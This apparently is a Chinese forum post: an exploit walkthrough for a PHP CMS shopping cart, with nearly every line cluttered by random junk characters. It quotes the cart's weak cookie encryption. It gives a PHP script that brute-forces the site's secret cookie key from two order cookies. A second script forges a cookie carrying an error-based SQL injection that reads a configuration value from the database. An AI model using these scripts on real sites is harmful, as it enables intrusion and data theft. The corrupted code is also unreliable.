www.xxx.com/plus/search.php?keyword=6 C' z0 E5 ~, O8 U
在 include/shopcar.class.php中$ G/ ?# E6 s+ w& ]# O& ^
先看一下这个shopcar类是如何生成cookie的
~5 V& q- n5 D; t0 [239 function saveCookie($key,$value)" E6 f7 ~& K) I3 u& ] C
240 {
! s3 J e8 [& Y: l( @* t241 if(is_array($value))) _' b: j8 r1 e8 L
242 {
0 i+ _( Z. p3 p3 w. ~# p1 h243 $value = $this->enCrypt($this->enCode($value));7 r( ], c, W$ C3 g/ j
244 }
* V3 i( w7 k% a4 p- ]8 n245 else
! h6 L8 S; Q. \7 }246 {' r3 j d( V( A+ w3 W8 G
247 $value = $this->enCrypt($value);
3 X) [, \) v* P7 d* \248 }
$ _; }8 T; m3 e0 @249 setcookie($key,$value,time()+36000,’/');
& q8 a( g0 Z4 Y7 k250 }* F, S# r$ S9 m
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
8 q) ]* A$ e1 ~3 K0 h186 function enCrypt($txt)
5 v/ P) `0 P$ u3 W187 {5 s6 o- Q0 j/ Y
188 srand((double)microtime() * 1000000);7 \& o! B" @3 J- E2 _ D
189 $encrypt_key = md5(rand(0, 32000));
; q: A" K$ Y' |& W( R190 $ctr = 0;
; V0 e0 k* H, D( ]; e! ]3 b191 $tmp = ”;
2 U6 \0 T" N d) i192 for($i = 0; $i < strlen($txt); $i++); }/ ?$ G4 v, Z& r8 m
193 {* X; K$ l1 j9 Z6 \0 e |8 _1 e$ p, Q" {
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;' J5 K- J' F" Z
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
% V& P$ e. L- o6 g196 }6 W5 \% {+ J$ G8 F' o0 g: V
197 return base64_encode($this->setKey($tmp));
! K9 ~ Y; l4 l, a' k9 e5 J% i; b7 P198 }
' B! w$ \6 c3 p [8 T' P213 function setKey($txt)
2 |. o9 w3 Q2 `9 o& v214 {
! l6 a. K K6 m( ]* D9 R) f215 global $cfg_cookie_encode;
" O" b/ s- _ b! p216 $encrypt_key = md5(strtolower($cfg_cookie_encode));/ x0 W# d: `. P* j
217 $ctr = 0;! U; e' E. g$ B m% S0 O. W
218 $tmp = ”;3 G \1 q8 y q0 M1 Z8 ~& }
219 for($i = 0; $i < strlen($txt); $i++)
" c1 \8 d0 d7 d* G! C; s' X3 P7 t220 {% i# J/ b' G* o9 j& S1 ^9 z. b
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;) I3 M P) b4 C& w) f. w0 |; e5 D
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];" w- W& l& O5 S" \7 j
223 }
' |2 F+ ^! E! P7 h224 return $tmp;2 B7 b& @ @% m) m, U) K
225 }3 J4 K$ k, A1 F, t2 W' q4 r4 V) o8 S
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
& n! |- d. K; J" ?0 k然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。4 E g& \- R' f) U- p5 B
具体代码如下:
L7 F' z7 T; L) v<?php, w5 j- J) e" g
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
& u: d- r) R9 J( k6 u% L! ?4 s$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here+ ]$ j3 u0 H8 l1 ]& y
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here9 |7 P0 _7 N! F3 o
function reStrCode($code,$string)
1 [' @5 j8 _1 J) A" V% g{ s, X# @/ N7 W( X* `
$code = base64_decode($code);
7 L/ b: h2 C; ?! C5 e7 u$key = “”;
W& ~# r3 G5 q, yfor($i=0 ; $i<32 ; $i++)) y* a4 A: `6 J) k+ y; j+ A0 j
{4 m; v2 x) C- H# V7 {8 J( g( d' {
$key .= $string[$i] ^ $code[$i];8 B( L4 g- |$ s+ N! }' U
}! J/ y9 ~) O* W- Z( [+ f
return $key;
7 _# Q7 l. n: A3 R" s9 s* h) Z, p) J}
- N( j! r, q* v. hfunction getKeys($cookie,$plantxt)7 b, I4 L; M9 ?
{; g& W0 b( W- F8 [
$tmp = $cookie;
2 n9 k3 Y/ b8 x8 Z$results = array();! M* k2 x0 l: J$ u6 f h' A- Y, v
for($j=0 ; $j < 32000; $j++)
0 K+ v( Y; U4 X7 {$ d+ k% k{' c1 `3 E4 |8 Z5 o* J
7 ^& d) _& Y9 c! y) C
$txt = $plantxt;5 _0 h9 F$ F" X+ [4 H. V e* R
$ctr = 0;, I5 i: j+ S" [/ C+ S
$tmp = ”;
: z, ? g6 V1 l( m8 |5 _$encrypt_key = md5($j);# J8 D+ O& L! ?
for($i =0; $i < strlen($txt); $i ++)
8 u( `4 s" m: i0 Y/ H# b{
( C/ L8 r. _3 t0 n% r& L$ k$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
4 r6 F7 x9 M- [$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);$ @2 h* O0 [3 Y: D
}
9 v( h! `) ^% Y: D3 c3 L# ?0 t5 l' Y$string = $tmp;
# I4 d& y6 v6 O3 X$code = $cookie;
% r$ F# n( A; P5 R" Y. H$result = reStrCode($code,$string);
* B( X+ V( F4 ~9 w- @if(eregi(‘^[a-z0-9]+$’,$result))
5 j7 b8 m# Q2 e{ s& X% P" q& v D' Z
echo $result.”\n”;8 ^; y7 a6 |. A% B! O/ s/ G
$results[] = $result;2 r7 b; w) Q+ D7 a
}
) A5 }; p4 h5 \}% L; P; Q4 X# d& M+ V* L
return $results;1 O5 v+ \% T& S. c/ A
}( Z/ `) }) |3 s2 V% T
$results1 = getKeys($cookie1,$plantxt);/ |8 c9 ~/ s5 @6 k3 ~) s3 B
$results2 = getKeys($cookie2,$plantxt);0 I' j. x$ k% {$ w
print “\n——————–real key————————–\n”;
+ w9 s5 k$ a( Y0 P% kforeach($results1 as $test1)
% n/ `3 T( s* U3 c& x# T& s{1 w) Z9 x2 ^$ \ t: t9 e1 T- z
foreach($results2 as $test2)- T' l4 Q' i5 |
{/ Y3 [* b' b' L" i+ k; D5 r
if($test1 == $test2). g, I& i, B) I1 `* C7 x; T
{( Y0 N4 C3 k# A# w+ O1 T2 t
echo $test1.”\n”;
; W$ I, l, U, w+ D' Z}
) W0 @4 ?! Z' J$ b1 o& G- R+ _}
: n6 O. n9 L% H J2 @$ U}
1 c6 e3 m' ]" C2 v5 o( b. o- W?>
3 l4 B2 a" U6 G& S, U7 ?$ v/ Fcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
: L* t% r9 y7 H* p% @) j6 U" `plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
/ F Z. T6 X* Z2 C0 N' H然后推算出md5(strtolower($cfg_cookie_encode))! ~- U" [5 G) V4 \+ @
得到这个key之后,我们就可以构造任意购物车的cookie: d4 b, |. a7 y. h) w
接着看3 | g2 V; l T4 H6 ^, y+ U, u
20 class MemberShops' D U c: _4 H j8 D
21 {) m& w! `8 F8 k, R3 b* V3 q
22 var $OrdersId;
9 W, i' Q P- }& c; v# ^23 var $productsId;- }2 p Z3 g& G, v# D* S
24( |+ x$ g/ ^7 M n
25 function __construct()% I i: V' | Y# `0 a& g
26 {' m( I% a+ y6 |7 Y+ g( L
27 $this->OrdersId = $this->getCookie(“OrdersId”);6 w2 H0 _' D1 t4 V `, s! D
28 if(empty($this->OrdersId))7 k# y, A9 Z6 }
29 {: b6 Q3 D2 v9 B
30 $this->OrdersId = $this->MakeOrders();) f) }& v. p1 i1 q) M& b
31 }! R# B$ q6 c9 k; f
32 }, r5 }1 ]. X: L
发现OrderId是从cookie里面获取的
1 f) b' u; c0 ^( o# c# z然后
) j9 i* b, [! y+ v/plus/carbuyaction.php中的' M, h" p6 G# B# D" Y6 D
29 $cart = new MemberShops();
6 ~, p4 H2 T! n39 $OrdersId = $cart->OrdersId; //本次记录的订单号
" L- {+ I1 ?/ e1 t0 Z/ @) X……$ m w5 G$ U1 y3 L
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
- w1 \) N5 ]* F o p! k接着我们就可以注入了
" `1 a7 i5 A7 m7 ~4 ~. R通过利用下面代码生成cookie:- U) ]* A' u. e, V6 z
<?php$ T7 N) B& ^9 {; F- U" [% _
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;1 u9 ?/ U; u$ w, J$ D$ X
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
, S( R( R4 b: W- h' Qfunction setKey($txt)* x1 N# r8 P$ N# l+ s
{- t! [; N& m! @& q) I
global $encrypt_key;8 B3 i5 T7 s& j% j& e9 ~- [; u7 c
$ctr = 0;
8 w3 H9 H. d. _. P% k$tmp = ”;
0 Y5 t! n/ w; w" Z! g/ K; p/ Qfor($i = 0; $i < strlen($txt); $i++)) g0 h# c# g f8 @; R
{
: d3 M/ `* h+ T4 e+ ]$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;1 _- x/ z1 G# h2 [! K, P9 _
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
+ h% B" O' o+ D* e F7 @1 R4 R}
/ `$ g7 `6 S& z# Dreturn $tmp;9 D" H- T( N$ Q0 @9 `# W) S+ H
}( N. X. o7 y( B5 l
function enCrypt($txt)
* e2 ?" ]/ d4 O! y, ~{+ z Z# ^% d, K- n: v
srand((double)microtime() * 1000000);1 g E" \- B+ J; q9 k" [
$encrypt_key = md5(rand(0, 32000));4 A: }& T( j% f. W& |; K# a
$ctr = 0;
; K3 G. t. Z" y/ |$tmp = ”;7 M/ z* V% s! X, R9 m- |
for($i = 0; $i < strlen($txt); $i++)
- u: k* k% f n5 f" [) c2 N# F{, i* ?! A4 i0 }* e6 `
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
: [1 Y6 C3 q/ y! Y6 i% H# `! H$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
$ D+ f4 K8 W% T5 G}, S) Q4 `+ Z% y6 [3 h
return base64_encode(setKey($tmp));
# j4 e3 X4 q3 ?" ^1 [9 t) }}
! }* C8 l9 V% Z- y% o; Zfor($dest =0;$dest = enCrypt($txt);)
4 j' c* P# A6 j) {{
, y% s. n3 R! y3 zif(!strpos($dest,’+')); E* K4 e8 ^/ N
{: r1 J0 V" Y5 U1 l8 a- C
break;7 u, f# S4 E" ?- R6 P, C
}7 M# ?- V/ l4 i5 j, N6 @+ M+ [1 B; H
}! F7 G, s' m( E; ?0 r; z
echo $dest.”\n”;
+ B! [; Z: k' w/ d: E( _' X2 P?>
G7 h: w6 w$ V! N+ K& R
6 z5 _0 j: U* n% \% s) `5 q |